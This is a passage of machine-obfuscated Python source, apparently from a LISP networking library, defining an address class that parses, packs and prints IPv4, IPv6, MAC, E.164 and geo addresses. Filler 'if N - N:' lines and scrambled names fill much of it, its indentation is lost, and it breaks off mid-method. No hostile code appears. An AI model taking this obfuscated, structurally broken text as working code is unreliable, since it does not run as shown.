if 76 - 76: OoO0O00 * ooOoO0o
if 32 - 32: O0 . oO0o * o0oOOo0O0Ooo . Ii1I + IiII
if 98 - 98: iII111i . II111iiii % O0
if 43 - 43: OOooOOo % I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
if 17 - 17: OoooooooOO - i1IIi * I11i
if 33 - 33: i1IIi . Oo0Ooo + I11i
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if 78 - 78: I1Ii111 + I1Ii111
if 43 - 43: I1Ii111 * o0oOOo0O0Ooo + i1IIi
if 19 - 19: Ii1I
if 51 - 51: oO0o
if 57 - 57: i11iIiiIii - Oo0Ooo + I1Ii111 * OoO0O00
if 35 - 35: o0oOOo0O0Ooo % II111iiii + O0
if 70 - 70: I1ii11iIi11i . II111iiii
if 54 - 54: OOooOOo
if 67 - 67: I1IiiI . o0oOOo0O0Ooo / i1IIi * I1ii11iIi11i . Oo0Ooo + II111iiii
if 63 - 63: OoOoOO00 - OoOoOO00
if 31 - 31: I1ii11iIi11i % O0 - i11iIiiIii * o0oOOo0O0Ooo . ooOoO0o * ooOoO0o
if 18 - 18: OoO0O00 - OoO0O00 . o0oOOo0O0Ooo
if 80 - 80: I11i + I1Ii111 / I1IiiI * OOooOOo % iII111i
if 48 - 48: iIii1I11I1II1 + i1IIi . I1IiiI % OoO0O00 - iIii1I11I1II1 / i1IIi
if 14 - 14: IiII . I11i
if 13 - 13: OoOoOO00 - I11i . OOooOOo % OoO0O00
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
if 9 - 9: iIii1I11I1II1
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 7 - 7: OoO0O00 - I11i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + i11iIiiIii
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 28 - 28: OoOoOO00 % ooOoO0o . I1IiiI + II111iiii
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 34 - 34: iIii1I11I1II1
if 65 - 65: II111iiii - iII111i / o0oOOo0O0Ooo
if 35 - 35: i11iIiiIii - Oo0Ooo . I1ii11iIi11i % OoOoOO00
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 20 - 20: OoO0O00
if 93 - 93: ooOoO0o + o0oOOo0O0Ooo - I1ii11iIi11i
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
o0o00O0oOooO0 = self . address
if ( ( ( o0o00O0oOooO0 & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( o0o00O0oOooO0 & 0xff000000 ) >> 24 ) == 172 ) :
o0O0o = ( o0o00O0oOooO0 & 0x00ff0000 ) >> 16
if ( o0O0o >= 16 and o0O0o <= 31 ) : return ( True )
if 15 - 15: iIii1I11I1II1 / I1ii11iIi11i * I1IiiI / i1IIi
if ( ( ( o0o00O0oOooO0 & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 57 - 57: o0oOOo0O0Ooo
if 69 - 69: i11iIiiIii
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 96 - 96: OOooOOo
if 99 - 99: O0 - II111iiii + iII111i / I11i
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 67 - 67: i1IIi
return ( 0 )
if 1 - 1: OoOoOO00 * O0 + i11iIiiIii . ooOoO0o / OoO0O00
if 48 - 48: o0oOOo0O0Ooo * II111iiii
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
o0o00O0oOooO0 = self . address >> 96
return ( o0o00O0oOooO0 == 0x20010005 )
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
return ( 0 )
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
if 14 - 14: OOooOOo * IiII
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
if 33 - 33: OoO0O00
def packet_format ( self ) :
if 91 - 91: I11i % I11i % iII111i
if 19 - 19: I11i / I11i + I1IiiI * OoO0O00 - iII111i . Oo0Ooo
if 76 - 76: iII111i % OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % i1IIi
if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 18 - 18: OoooooooOO + ooOoO0o * OoOoOO00 - OoO0O00
if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
def pack_address ( self ) :
O0O00Oo = self . packet_format ( )
IiiiIi1iiii11 = ""
if ( self . is_ipv4 ( ) ) :
IiiiIi1iiii11 = struct . pack ( O0O00Oo , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
ooOo0O0 = byte_swap_64 ( self . address >> 64 )
ooo0 = byte_swap_64 ( self . address & 0xffffffffffffffff )
IiiiIi1iiii11 = struct . pack ( O0O00Oo , ooOo0O0 , ooo0 )
elif ( self . is_mac ( ) ) :
o0o00O0oOooO0 = self . address
ooOo0O0 = ( o0o00O0oOooO0 >> 32 ) & 0xffff
ooo0 = ( o0o00O0oOooO0 >> 16 ) & 0xffff
OOOo00oO = o0o00O0oOooO0 & 0xffff
IiiiIi1iiii11 = struct . pack ( O0O00Oo , ooOo0O0 , ooo0 , OOOo00oO )
elif ( self . is_e164 ( ) ) :
o0o00O0oOooO0 = self . address
ooOo0O0 = ( o0o00O0oOooO0 >> 32 ) & 0xffffffff
ooo0 = ( o0o00O0oOooO0 & 0xffffffff )
IiiiIi1iiii11 = struct . pack ( O0O00Oo , ooOo0O0 , ooo0 )
elif ( self . is_dist_name ( ) ) :
IiiiIi1iiii11 += self . address + "\0"
if 19 - 19: O0 . O0
return ( IiiiIi1iiii11 )
if 13 - 13: i11iIiiIii - i11iIiiIii . iIii1I11I1II1 - O0 . I11i / i11iIiiIii
if 59 - 59: ooOoO0o + I1ii11iIi11i . OoO0O00 . O0
def unpack_address ( self , packet ) :
O0O00Oo = self . packet_format ( )
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 45 - 45: O0 . o0oOOo0O0Ooo + OoOoOO00 / I1ii11iIi11i + Ii1I % I1Ii111
o0o00O0oOooO0 = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 20 - 20: Oo0Ooo
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( o0o00O0oOooO0 [ 0 ] )
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
elif ( self . is_ipv6 ( ) ) :
if 2 - 2: OoooooooOO + IiII / iII111i . iIii1I11I1II1 * OoOoOO00
if 84 - 84: OOooOOo
if 68 - 68: I1Ii111
if 92 - 92: oO0o * Ii1I / OoO0O00 % II111iiii
if 54 - 54: oO0o + I11i - OoO0O00
if 86 - 86: OoooooooOO
if 51 - 51: i11iIiiIii
if 91 - 91: OOooOOo
if ( o0o00O0oOooO0 [ 0 ] <= 0xffff and ( o0o00O0oOooO0 [ 0 ] & 0xff ) == 0 ) :
IiIIi1i = ( o0o00O0oOooO0 [ 0 ] << 48 ) << 64
else :
IiIIi1i = byte_swap_64 ( o0o00O0oOooO0 [ 0 ] ) << 64
if 82 - 82: I1IiiI / I11i
OO00 = byte_swap_64 ( o0o00O0oOooO0 [ 1 ] )
self . address = IiIIi1i | OO00
if 65 - 65: ooOoO0o
elif ( self . is_mac ( ) ) :
oOiII1i1 = o0o00O0oOooO0 [ 0 ]
ii1III = o0o00O0oOooO0 [ 1 ]
Ii11 = o0o00O0oOooO0 [ 2 ]
self . address = ( oOiII1i1 << 32 ) + ( ii1III << 16 ) + Ii11
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
elif ( self . is_e164 ( ) ) :
self . address = ( o0o00O0oOooO0 [ 0 ] << 32 ) + o0o00O0oOooO0 [ 1 ]
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
IiIii1i = 0
if 93 - 93: iIii1I11I1II1 % OoooooooOO
packet = packet [ IiIii1i : : ]
return ( packet )
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
if 87 - 87: iII111i
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 86 - 86: IiII - I11i
if 99 - 99: i1IIi + I1ii11iIi11i
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 91 - 91: I1Ii111 * iII111i * OoO0O00
if 79 - 79: iII111i + oO0o
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if 10 - 10: OOooOOo * OoooooooOO
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 62 - 62: I11i
if 58 - 58: I11i . OoOoOO00 + iII111i . iII111i
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 66 - 66: iII111i + i1IIi
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 24 - 24: O0 / OoooooooOO - OoOoOO00
return ( False )
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
if 53 - 53: i11iIiiIii % I1ii11iIi11i
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 59 - 59: OOooOOo
if 61 - 61: OoooooooOO + O0 - i1IIi % oO0o / I1ii11iIi11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 50 - 50: oO0o + II111iiii * OoOoOO00 % OoO0O00 . II111iiii % o0oOOo0O0Ooo
if 32 - 32: i1IIi / Ii1I + i11iIiiIii % oO0o
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 11 - 11: Ii1I - ooOoO0o % i11iIiiIii / OoooooooOO - O0 - IiII
if 25 - 25: IiII + O0 + oO0o % iIii1I11I1II1 - II111iiii . I1IiiI
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 62 - 62: IiII . O0 + oO0o - ooOoO0o * iIii1I11I1II1
if 8 - 8: I1ii11iIi11i
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 65 - 65: i11iIiiIii
if 92 - 92: oO0o * II111iiii + I1Ii111
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 49 - 49: II111iiii * I1IiiI * O0 / ooOoO0o * IiII
if 94 - 94: OoO0O00 - I1IiiI * oO0o
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 35 - 35: OOooOOo / i1IIi + OoO0O00
if 31 - 31: OoO0O00 . i1IIi / OoooooooOO
if 81 - 81: ooOoO0o . Oo0Ooo . OoOoOO00 + OOooOOo % iII111i - oO0o
if 68 - 68: iII111i - O0 / Ii1I
iIi1I1 = addr_str . find ( "[" )
oO00000o0OO0 = addr_str . find ( "]" )
if ( iIi1I1 != - 1 and oO00000o0OO0 != - 1 ) :
self . instance_id = int ( addr_str [ iIi1I1 + 1 : oO00000o0OO0 ] )
addr_str = addr_str [ oO00000o0OO0 + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 15 - 15: I1Ii111 / I1ii11iIi11i / I1IiiI % i11iIiiIii + II111iiii . ooOoO0o
if 74 - 74: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i * II111iiii - Oo0Ooo % i1IIi % O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if ( self . is_ipv4 ( ) ) :
I1i11I = addr_str . split ( "." )
Oo00OO0OO = int ( I1i11I [ 0 ] ) << 24
Oo00OO0OO += int ( I1i11I [ 1 ] ) << 16
Oo00OO0OO += int ( I1i11I [ 2 ] ) << 8
Oo00OO0OO += int ( I1i11I [ 3 ] )
self . address = Oo00OO0OO
elif ( self . is_ipv6 ( ) ) :
if 71 - 71: iIii1I11I1II1 % I1Ii111 % IiII / IiII + iIii1I11I1II1 % i1IIi
if 93 - 93: Oo0Ooo / I1ii11iIi11i + Oo0Ooo + OOooOOo
if 58 - 58: oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if 82 - 82: OoooooooOO
if 14 - 14: OoO0O00 / oO0o - OOooOOo
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
IIII1iiIiiI = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 92 - 92: I11i + OoO0O00 . OoooooooOO
addr_str = binascii . hexlify ( addr_str )
if 3 - 3: OoO0O00 % iIii1I11I1II1
if ( IIII1iiIiiI ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
self . address = int ( addr_str , 16 )
if 59 - 59: iIii1I11I1II1
elif ( self . is_geo_prefix ( ) ) :
I1Ii1i111I = lisp_geo ( None )
I1Ii1i111I . name = "geo-prefix-{}" . format ( I1Ii1i111I )
I1Ii1i111I . parse_geo_string ( addr_str )
self . address = I1Ii1i111I
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
Oo00OO0OO = int ( addr_str , 16 )
self . address = Oo00OO0OO
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
Oo00OO0OO = int ( addr_str , 16 )
self . address = Oo00OO0OO << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
self . mask_len = self . host_mask_len ( )
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
ooo = prefix_str . find ( "]" )
oO00OO0Ooo00O = len ( prefix_str [ ooo + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , oO00OO0Ooo00O = prefix_str . split ( "/" )
else :
O0OO0 = prefix_str . find ( "'" )
if ( O0OO0 == - 1 ) : return
Ii1IiIiIi1IiI = prefix_str . find ( "'" , O0OO0 + 1 )
if ( Ii1IiIiIi1IiI == - 1 ) : return
oO00OO0Ooo00O = len ( prefix_str [ O0OO0 + 1 : Ii1IiIiIi1IiI ] ) * 8
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( oO00OO0Ooo00O )
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
iIi1ii = ( 2 ** self . mask_len ) - 1
IiII1II1IiI1i1II = self . addr_length ( ) * 8 - self . mask_len
iIi1ii <<= IiII1II1IiI1i1II
self . address &= iIi1ii
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
def is_geo_string ( self , addr_str ) :
ooo = addr_str . find ( "]" )
if ( ooo != - 1 ) : addr_str = addr_str [ ooo + 1 : : ]
if 53 - 53: OOooOOo % ooOoO0o
I1Ii1i111I = addr_str . split ( "/" )
if ( len ( I1Ii1i111I ) == 2 ) :
if ( I1Ii1i111I [ 1 ] . isdigit ( ) == False ) : return ( False )
if 94 - 94: OOooOOo - O0 - I1Ii111 / OoooooooOO - iII111i
I1Ii1i111I = I1Ii1i111I [ 0 ]
I1Ii1i111I = I1Ii1i111I . split ( "-" )
O00O00oOO0Oo = len ( I1Ii1i111I )
if ( O00O00oOO0Oo < 8 or O00O00oOO0Oo > 9 ) : return ( False )
if 99 - 99: oO0o . i11iIiiIii % i1IIi + iII111i
for O0o in range ( 0 , O00O00oOO0Oo ) :
if ( O0o == 3 ) :
if ( I1Ii1i111I [ O0o ] in [ "N" , "S" ] ) : continue
return ( False )
if 27 - 27: O0 % ooOoO0o / oO0o * i1IIi + ooOoO0o * oO0o
if ( O0o == 7 ) :
if ( I1Ii1i111I [ O0o ] in [ "W" , "E" ] ) : continue
return ( False )
if 67 - 67: iIii1I11I1II1 . iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if ( I1Ii1i111I [ O0o ] . isdigit ( ) == False ) : return ( False )
if 70 - 70: I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
return ( True )
if 12 - 12: Oo0Ooo + I1IiiI
if 12 - 12: OoOoOO00 / II111iiii
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 28 - 28: I1IiiI
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
def print_address ( self ) :
o0o00O0oOooO0 = self . print_address_no_iid ( )
IiIIi11i111 = "[" + str ( self . instance_id )
for iIi1I1 in self . iid_list : IiIIi11i111 += "," + str ( iIi1I1 )
IiIIi11i111 += "]"
o0o00O0oOooO0 = "{}{}" . format ( IiIIi11i111 , o0o00O0oOooO0 )
return ( o0o00O0oOooO0 )
if 46 - 46: II111iiii
if 24 - 24: i11iIiiIii * i1IIi - I11i + o0oOOo0O0Ooo
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
o0o00O0oOooO0 = self . address
oOoo0ooOOOO0o = o0o00O0oOooO0 >> 24
OO0 = ( o0o00O0oOooO0 >> 16 ) & 0xff
I11ii = ( o0o00O0oOooO0 >> 8 ) & 0xff
iIIIiiIiIII = o0o00O0oOooO0 & 0xff
return ( "{}.{}.{}.{}" . format ( oOoo0ooOOOO0o , OO0 , I11ii , iIIIiiIiIII ) )
elif ( self . is_ipv6 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 32 )
oo0o00OO = binascii . unhexlify ( oo0o00OO )
oo0o00OO = socket . inet_ntop ( socket . AF_INET6 , oo0o00OO )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 12 )
oo0o00OO = "{}-{}-{}" . format ( oo0o00OO [ 0 : 4 ] , oo0o00OO [ 4 : 8 ] ,
oo0o00OO [ 8 : 12 ] )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_e164 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oo0o00OO ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 10 - 10: oO0o * i11iIiiIii % i1IIi + I1ii11iIi11i + Oo0Ooo
return ( "unknown-afi:{}" . format ( self . afi ) )
if 36 - 36: O0 - iII111i + I11i + I1IiiI
if 89 - 89: OoOoOO00 / Ii1I - OoO0O00 % I11i - oO0o . Ii1I
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
O00ooOOoO0o0o = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , O00ooOOoO0o0o ) )
if 97 - 97: o0oOOo0O0Ooo + iIii1I11I1II1
o0o00O0oOooO0 = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( o0o00O0oOooO0 )
if ( self . is_geo_prefix ( ) ) : return ( o0o00O0oOooO0 )
if 65 - 65: iIii1I11I1II1 - OoOoOO00 % Oo0Ooo . i11iIiiIii . ooOoO0o
ooo = o0o00O0oOooO0 . find ( "no-address" )
if ( ooo == - 1 ) :
o0o00O0oOooO0 = "{}/{}" . format ( o0o00O0oOooO0 , str ( self . mask_len ) )
else :
o0o00O0oOooO0 = o0o00O0oOooO0 [ 0 : ooo ]
if 86 - 86: OoOoOO00 / Ii1I
return ( o0o00O0oOooO0 )
if 80 - 80: II111iiii
if 66 - 66: ooOoO0o
def print_prefix_no_iid ( self ) :
o0o00O0oOooO0 = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( o0o00O0oOooO0 )
if ( self . is_geo_prefix ( ) ) : return ( o0o00O0oOooO0 )
return ( "{}/{}" . format ( o0o00O0oOooO0 , str ( self . mask_len ) ) )
if 61 - 61: O0 / II111iiii + I1IiiI + I1ii11iIi11i * Oo0Ooo * I1ii11iIi11i
if 7 - 7: i11iIiiIii * ooOoO0o * II111iiii - OOooOOo
def print_prefix_url ( self ) :
